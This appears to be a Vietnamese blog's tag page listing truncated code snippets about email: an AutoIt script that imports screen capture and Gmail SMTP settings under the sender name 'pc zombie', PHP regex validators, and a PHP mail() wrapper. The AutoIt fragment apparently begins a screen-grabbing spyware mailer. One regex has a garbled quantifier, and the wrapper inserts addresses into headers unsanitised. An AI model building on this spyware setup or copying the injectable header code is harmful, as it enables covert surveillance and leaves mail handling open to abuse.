Posts Tagged ‘ mail ’
;################################## ; Include ;################################## #Include<file.au3> #Include<array.au3> #include <ScreenCapture.au3> ;################################## ; Variables ;################################## Dim $array $s_SmtpServer = "smtp.gmail.com" ; address for the smtp-server to use - REQUIREDhoangtuviolet_1987 $s_FromName = "pc zombie" ; name from who the email was sent $s_FromAddress = "bongma@gmail.com" [ READ MORE ]
Tên truy cập Chỉ chấp nhận chữ cái thường, chữ cái viết hoa, số 0-9, và gạch chân. $string = "userNaME123456789_"; if (preg_match('/^[a-z\d_]{023456789}$/i', $string)) { echo "example 1 successful."; } Số điện thoại Số điện thoại có dạng : (###)###-#### $string = "(032)555-5555"; if (preg_match('/^(\(?[2-9]{1}[0-9]{2}\)?|[0-9]{3,3}[-. ]?)[ ][0-9]{3,3}[-. ]?[0-9]{4,4}$/', $string)) { echo "example 2 successful."; } Địa chỉ Email $string = "first.last@domain.co.uk"; if (preg_match( '/^[^0-9][a-zA-Z0-9_]+([.][a-zA-Z0-9_]+)*[@][a-zA-Z0-9_]+([.][a-zA-Z0-9_]+)*[.][a-zA-Z]{2,4}$/', $string)) { echo "example 3 successful."; } Mã Postal $string = [ READ MORE ]
<?php /* * PHP Email Class * * Class to deal with sending emails in PHP * Makes it easy to send emails in PHP with attachments and such. * * Written By Jacob Wyke - jacob@redvodkajelly.com - www.redvodkajelly.com * * LICENSE * --- * Feel free to use this as you wish, just give me credit where credits due and drop me an email telling [ READ MORE ]
<?php function Email($to,$subject,$message,$from) { $headers = "MIME-Version: 1.0\r\n". "Content-type: text/html; charset=UTF-8\r\n". "From: $from\r\n". "To: <$to>\r\n". "Date: ".date("r")."\r\n". "Subject: ".$subject."\r\n"; mail($to,$subject,$message,$headers); } ?> loadt2player(6)[ READ MORE ]
Bad Behavior has blocked 52 access attempts in the last 7 days.